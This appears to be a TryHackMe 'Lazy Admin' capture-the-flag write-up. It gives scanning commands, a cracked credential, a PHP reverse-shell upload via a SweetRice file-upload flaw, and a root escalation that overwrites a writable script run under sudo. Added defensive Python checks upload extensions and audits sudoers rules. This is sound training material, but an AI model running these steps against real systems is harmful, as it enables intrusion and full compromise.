Lazy Admin THM

IP

10.10.109.129

Nmap initial scan

sudo nmap -sV -sC -A -oA nmap_inital 10.10.109.129

Nmap full scan

nmap -p- -T5 10.10.109.129

Ports

22:SSH

80:HTTP

  • Most likely Apache2's default page

Port 80 Apache 2.4.18

When we navigate to http://10.10.109.129:80 we are greeted with the Apache2 Ubuntu default page.

  • This is itself an information disclosure: we now know for sure we are dealing with an Ubuntu host.

Let's perform some directory busting and see if we can find anything interesting.

feroxbuster -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://10.10.109.129:80 -o dirs.txt

Within our results, we find a MySQL backup file:

http://10.10.109.129/content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql

When we download the backup file, we can find a password hash.

cat mysql_bakup_20191129023059-1.5.1.sql | grep pass

We can take this hash to https://crackstation.net/ and recover the password:

Password123

Let's see if we can SSH into the target.

ssh admin@10.10.109.129

  • It didn't work.

Back in our ferox results we also find

http://10.10.109.129/content/

  • This seems like a website management system; it does mention a dashboard.

The same results also include

http://10.10.109.129/content/as/

We can use the creds we found earlier:

manager: Password123

We are brought to SweetRice's dashboard.

  • The dashboard shows SweetRice version 1.5.1.

A quick Google search shows that this version is vulnerable to arbitrary file upload; see the following:

https://www.exploit-db.com/exploits/40716

Wappalyzer shows that SweetRice uses PHP, meaning we can upload a PHP reverse shell and hopefully get a shell on the system.

For this, we can use Pentest Monkey's PHP reverse shell. We can download it with wget:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Then we need to modify the script slightly so that it calls back to our listener.

Let's start a Netcat listener:

nc -lvnp 9005

We also need to change the extension from .php to .php5 for the exploit to take effect:

mv php-reverse-shell.php rev.php5

Now let's upload the file: within Post -> create, add the file and submit the post.

When we navigate to

http://10.10.109.129/content/attachment/

we will see our rev.php5 file sitting in the directory.

When we click on the file, we should receive a callback from the target and establish a reverse shell.
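The rename to .php5 works because the upload check evidently rejects the literal .php extension while the server still executes alternative PHP extensions, as the shell callback confirms. The fix on the application side is an allow-list on the final extension rather than a block-list of known-bad ones. The following is an added example written for this page; it is not SweetRice's code or anything from the original writeup, and the allowed extension set is an assumption about what an attachment feature needs.

```python
"""Allow-list upload-name validation (added example; not SweetRice code)."""
import re
from typing import Tuple

# Assumption: the attachment feature only needs images and a few documents.
ALLOWED_EXTENSIONS = {"png", "jpg", "jpeg", "gif", "pdf", "txt"}

# Extensions a typical PHP/Apache setup may hand to an interpreter. They are
# rejected by the allow-list anyway; naming them gives a clearer audit reason.
SERVER_EXECUTABLE = {"php", "php3", "php4", "php5", "php7", "phtml", "phar",
                     "phps", "pht", "cgi", "pl", "sh"}

_SAFE_BASENAME = re.compile(r"^[a-z0-9_-]{1,64}$")


def validate_upload_name(filename: str) -> Tuple[bool, str]:
    """Return (accepted, reason) for a client-supplied file name.

    Only the final path component is considered, the comparison is
    case-insensitive, and exactly one extension is permitted so that
    names such as shell.php.jpg are rejected rather than interpreted.
    """
    name = re.split(r"[\\/]", filename)[-1].strip().lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "no usable extension"
    base, exts = parts[0], parts[1:]
    if not _SAFE_BASENAME.match(base):
        return False, "unsafe characters in base name"
    if len(exts) > 1:
        return False, "multiple extensions: " + ".".join(exts)
    ext = exts[0]
    if ext in SERVER_EXECUTABLE:
        return False, f"server-executable extension '{ext}'"
    if ext not in ALLOWED_EXTENSIONS:
        return False, f"extension '{ext}' not on allow-list"
    return True, "ok"


if __name__ == "__main__":
    # Constructed sample names, including the rename used in the writeup.
    for candidate in ["photo.jpg", "Report.PDF", "rev.php5", "shell.php.jpg",
                      "../../index.phtml", "notes"]:
        print(f"{candidate:20} -> {validate_upload_name(candidate)}")
```

Even with this check in place, uploaded files should be stored under a server-generated name and served from a location where the PHP handler is not enabled, so that a validation mistake cannot turn into code execution.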

Privilege Escalation via www-data

Let's stabilize our shell:

python3 -c 'import pty;pty.spawn("/bin/bash")'

First, let's check our privileges:

sudo -l

We can run Perl as sudo with no password on a specific file, backup.pl. Let's read the script and get a better idea of what it does:

cat backup.pl

  • It looks like the script is using sh to execute another script, /etc/copy.sh.

As you can see, we have write permission on /etc/copy.sh, meaning we can alter the file.

We'll simply overwrite the file and tell it to run bash:

echo "/bin/bash" > /etc/copy.sh

now when we run

sudo /usr/bin/perl /home/itguy/backup.pl

we have a root shell.
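The root cause here is not Perl or sudo but the trust chain: a NOPASSWD rule runs a root-owned script that in turn executes a file anyone on the box can write to. An audit that follows that chain catches the misconfiguration before someone else does. The script below is an added example written for this page, not part of the writeup or of the target machine; it parses sudoers-format rules (not `sudo -l` output), collects the absolute paths named in the rule and inside any readable script it runs, and reports those writable by group or world. The sudoers line in `demo()` is a constructed assumption about how the box grants `perl /home/itguy/backup.pl` without a password, and the temp-dir layout stands in for the real paths.

```python
"""Audit NOPASSWD sudo rules for scripts that trust group- or world-writable files.

Added example, not part of the original writeup or of the target machine.
"""
import os
import re
import stat
import tempfile
from typing import Dict, List

# Command portion of a sudoers rule, e.g.
#   itguy ALL=(ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl
_NOPASSWD_RULE = re.compile(r"NOPASSWD:\s*(.+)$")
# Absolute paths written inside a script body (system(), backticks, "sh /x/y" ...).
_ABS_PATH = re.compile(r"(?:/[\w.\-]+)+")


def nopasswd_commands(sudoers_text: str) -> List[List[str]]:
    """Return argv lists for every command granted with NOPASSWD."""
    commands: List[List[str]] = []
    for raw in sudoers_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        match = _NOPASSWD_RULE.search(line)
        if match:
            for cmd in match.group(1).split(","):
                commands.append(cmd.split())
    return commands


def referenced_paths(script_path: str) -> List[str]:
    """Absolute paths mentioned in a script's text (one level, no recursion)."""
    with open(script_path, "r", errors="replace") as fh:
        return sorted(set(_ABS_PATH.findall(fh.read())))


def writable_by_others(path: str) -> bool:
    """True when the file exists and its group or the world can write to it."""
    try:
        mode = os.stat(path).st_mode
    except OSError:
        return False
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_sudoers(sudoers_text: str) -> Dict[str, List[str]]:
    """Map each NOPASSWD rule to the loosely writable files it ends up trusting.

    Checked: absolute paths in the rule itself (the interpreter, the script)
    and absolute paths named inside any readable script the rule runs.
    """
    findings: Dict[str, List[str]] = {}
    for argv in nopasswd_commands(sudoers_text):
        candidates = [arg for arg in argv if arg.startswith("/")]
        for arg in list(candidates):
            if os.path.isfile(arg) and os.access(arg, os.R_OK):
                candidates.extend(referenced_paths(arg))
        weak = sorted({p for p in candidates if writable_by_others(p)})
        if weak:
            findings[" ".join(argv)] = weak
    return findings


def demo() -> Dict[str, List[str]]:
    """Recreate the writeup's shape in a temp dir: a Perl wrapper that runs a
    shell script anyone can edit. Constructed sample; not the real paths."""
    root = tempfile.mkdtemp(prefix="sudo_audit_")
    helper = os.path.join(root, "copy.sh")
    script = os.path.join(root, "backup.pl")
    with open(helper, "w") as fh:
        fh.write("#!/bin/sh\ncp -r /var/www/html /tmp/backup\n")
    os.chmod(helper, 0o666)  # the misconfiguration under test
    with open(script, "w") as fh:
        fh.write(f'#!/usr/bin/perl\nsystem("sh", "{helper}");\n')
    os.chmod(script, 0o644)
    # Constructed sudoers line (assumption about how the box grants the rule).
    return audit_sudoers(f"itguy ALL=(ALL) NOPASSWD: /usr/bin/perl {script}\n")


if __name__ == "__main__":
    for rule, files in demo().items():
        print(f"{rule}\n  writable by others: {', '.join(files)}")
```

Run against a real host, the same functions take the contents of /etc/sudoers and /etc/sudoers.d/* as input; anything reported should be made root-owned and mode 0644 or 0755, or the rule should be narrowed so that it no longer reaches a user-modifiable file.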
